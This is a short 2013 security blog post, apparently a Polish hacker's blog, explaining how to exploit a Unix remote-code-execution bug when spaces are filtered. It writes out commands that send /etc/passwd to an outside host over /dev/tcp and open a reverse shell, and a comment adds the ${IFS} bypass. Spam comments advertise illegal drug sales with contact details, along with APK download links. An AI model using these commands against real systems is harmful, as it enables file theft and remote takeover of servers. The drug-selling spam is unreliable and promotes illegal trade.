czwartek, 10 października 2013

[EN] Unix RCE without spaces

You have Remote Code Execution bug - but spaces are removed. How to pass parameters in this case? And what if we can't see the result of executed command? Let's do small trick - redirecting default input / output.

Here we go:

zoczus@hell:~$ cat</etc/debian_version 
7.1

:) Can't see the output? Send it through Internet!

[host1]
zoczus@hell:~$ cat</etc/passwd>/dev/tcp/xxxx.pl/5060


[host2]
zoczus@jano:~$ nc -l -p 5060
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
(...)

It looks all right ;) You can also create reverse shell:

sh</dev/tcp/xxxx.pl/5060>/dev/tcp/xxxx.pl/2222

So now the /bin/sh input (commands) will be taken from xxxx.pl:5060 and result - sent to xxxx.pl:2222

I hope this one was useful ;)

10 komentarzy:

  1. Cool note - I've just learned about /dev/tcp recently and I was really surprised to see such a thing since I've looked at /dev quite often and had never seen it - that of course might be related to the fact, that it's not a device, it's a bash feature huh ;)

    As for spaces, ${IFS} can be used instead (field separator). I guess there was that old bug with IFS not being cleared in suid binaries calling system("/bin/something"); later on, and you would switch IFS to / and make a file called bin in cwd ;) (fixing PATH to point at . as well ofc).

    Cheers

    OdpowiedzUsuń
    Odpowiedzi
    1. Answering after month - right... ;-) Anyway thanks for reading. Solution with IFS seems to be simpler and better than "mine" ;)

      Usuń
  2. This is one of the best post i have read in months, its really great and inspiring, i will really like to read more form you and will like to share with others as well, keep writing more
    Buy Weed Seeds Online
    Buy A-796,260 Online
    Buy Phenethylamine Psychedelics online
    Subutex 8mg Online
    Order Quaaludes Mandrax 300mg online
    Buy DMT Dimethyltryptamine Online
    Valium Diazepam For Sale Online
    Buy Harvoni ledipasvir sofosbuvir online
    Cannabis Oil For Sale
    Buy enzodiazepines online you can as well Whatsapp/Text +1(646)883-3072 , Telegram: primenature or email:primepharma0@gmail.com for more details.

    OdpowiedzUsuń




  3. Wonderful information! I found amazing information on the blogs i suggest everyone to follow the links below to get download files from this website.



    https://apkfasak.com/fmwhatsapp-apk/
    https://apkfasak.com/gb-whatsapp-apk/




    OdpowiedzUsuń
  4. good
    tanks alot

    https://chartiran.com

    OdpowiedzUsuń